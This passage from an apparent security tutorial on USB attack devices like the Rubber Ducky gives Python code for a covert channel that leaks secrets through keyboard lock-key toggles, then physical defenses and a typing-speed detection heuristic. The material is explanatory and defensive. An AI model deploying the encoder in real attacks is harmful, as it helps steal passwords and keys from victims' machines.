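    """Malware side: turn bytes into a sequence of lock-key toggles, most significant bit first."""
    bits = "".join(f"{byte:08b}" for byte in data)
    return [BIT_KEYS[bit] for bit in bits] + [END_KEY]


def decode(toggles: list[str]) -> bytes:
    """Device side: reassemble bytes from observed toggles, stopping at the end marker."""
    reverse = {key: bit for bit, key in BIT_KEYS.items()}
    bits = []
    for key in toggles:
        if key == END_KEY:
            break
        bits.append(reverse[key])
    usable = len(bits) - len(bits) % 8  # ignore a trailing partial byte
    return bytes(int("".join(bits[i:i + 8]), 2) for i in range(0, usable, 8))
```

Every byte costs eight LED round trips, so a channel like this is likely practical only for small secrets such as passwords or keys rather than bulk files.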

The defense against Rubber Ducky is primarily physical:

- Lock computers when stepping away, even briefly
- Disable USB ports through BIOS settings or group policy
- Require authentication for new USB devices (though this can be bypassed in some scenarios)
- Use USB port blockers that physically prevent unauthorized devices from being plugged in
- Monitor for unusual USB activity, though this only helps detect attacks, not prevent them
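One signal that monitoring can use is the superhuman typing speed described earlier. The sketch below is a hypothetical heuristic. It assumes key-press timestamps in milliseconds are already available from some OS input hook, which is outside its scope. It flags a burst when the median gap between keystrokes falls below a floor. The 30 ms floor and the 20-key minimum are illustrative assumptions, not measured thresholds.

```python
from statistics import median

HUMAN_FLOOR_MS = 30.0  # assumption: sustained gaps this short are implausible for human typists


def looks_injected(timestamps_ms: list[float], min_keys: int = 20,
                   floor_ms: float = HUMAN_FLOOR_MS) -> bool:
    """Flag a burst of keystrokes whose typical inter-key gap is faster than a person plausibly types."""
    if len(timestamps_ms) < min_keys:
        return False  # too few keys to judge; short fast bursts happen naturally
    gaps = [later - earlier for earlier, later in zip(timestamps_ms, timestamps_ms[1:])]
    return median(gaps) < floor_ms
```

Using the median rather than the minimum keeps occasional fast key pairs from a human typist from triggering an alert. An attacker can still evade the check by inserting delays between keystrokes, at the cost of a slower attack, so this is one signal among several rather than a complete defense.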

Similar devices include:

- Bash Bunny ($200), which can present multiple device types simultaneously and execute more complex attacks
- USB Ninja Cable and O.MG Cable, ordinary-looking USB cables with attack hardware built in
- Various DIY projects using Arduino or Raspberry Pi platforms

These devices represent a category of attacks that blend physical and digital techniques. They require physical access (at least briefly), but the payload is entirely digital. They're effective against even well-secured networks because they operate inside the perimeter defenses.

In the next part, we'll examine social engineering attacks—how attackers manipulate human psychology to deliver malware and achieve their objectives without requiring technical exploits at all.